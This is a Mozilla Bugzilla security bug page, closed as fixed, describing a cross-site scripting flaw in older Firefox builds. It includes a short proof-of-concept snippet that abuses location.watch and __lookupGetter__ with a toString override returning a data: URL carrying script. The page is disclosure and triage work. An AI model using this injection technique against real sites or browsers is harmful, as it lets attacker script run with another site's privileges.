Closed Bug 361961 Opened 18 years ago Closed 17 years ago

XSS by using location.watch("href") and Object.prototype.__lookupGetter__ or __lookupSetter__

Categories

(Core :: DOM: Core & HTML, defect)

Product:
Core
Component:
DOM: Core & HTML
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED
Milestone:
mozilla1.9alpha8

People

(Reporter: moz_bug_r_a4, Assigned: mrbkap)

References

Details

(Whiteboard: [sg:high] fixed by XOW) 

This XSS attack only works against certain sites that are using scripts that
try to change a parent window's location.href.

An attacker can run script with a target site's principal by using
location.watch("href", ...) and Object.prototype.__lookup(G|S)etter__ method
that came from an xbl compilation scope or a target site's global scope.

  <marquee id="m">
  func = m.init.__lookupGetter__;
    or
  <iframe src="target site">
  func = frames[0].location.__lookupGetter__;

  location.watch("href", func);
  location.__lookupGetter__("href").toString = function() {
    return "data:text/html,<script> ... </script>";
  };

1. A target site's script executes |top.location.href = foo|.
2. __lookupGetter__("href", undefined, foo) is called on the location object in
   top window, and it returns the location.href getter function.
3. The href getter function's toString() method is called and returns a data:
   url.
4. The data: url is loaded with the target site's principal.


This affects the trunk, fx2.0.0.1, fx1.5.0.9, fx1.0.8 and moz1.7.13.
Attached file (deleted) — 

    
    

    
  

      
      
      
      

        Attached file
          
         (deleted)
        — 
      

    


  

    
    

    
  
The "watch" part reminds me of bug 354978, but that one is fixed now and doesn't do anything to stop these testcases.

Assignee: dveditz → mrbkap
Whiteboard: [sg:high]

    
  
Component: Security → DOM
Flags: blocking1.9+

    
    

    
  
Targeting to B1 per conversation with Blake. 
Target Milestone: --- → mozilla1.9beta1

    
    

    
  
Fixed by cross origin wrappers.
Status: NEW → RESOLVED
Closed: 17 years ago
Depends on: xow
Resolution: --- → FIXED

    
  
Flags: in-testsuite?
Flags: wanted1.8.1.x+
Flags: blocking1.8.1.7?
Whiteboard: [sg:high] → [sg:high] fixed by XOW
Flags: blocking1.8.1.8? → blocking1.8.1.9?
Flags: blocking1.8.1.12? → blocking1.8.1.13?
Flags: blocking1.8.1.13?

        Attachment #246672 -
        Attachment is private: true

        Attachment #246673 -
        Attachment is private: true
Group: core-security
Component: DOM → DOM: Core & HTML

          You need to log in
          before you can comment on or make changes to this bug.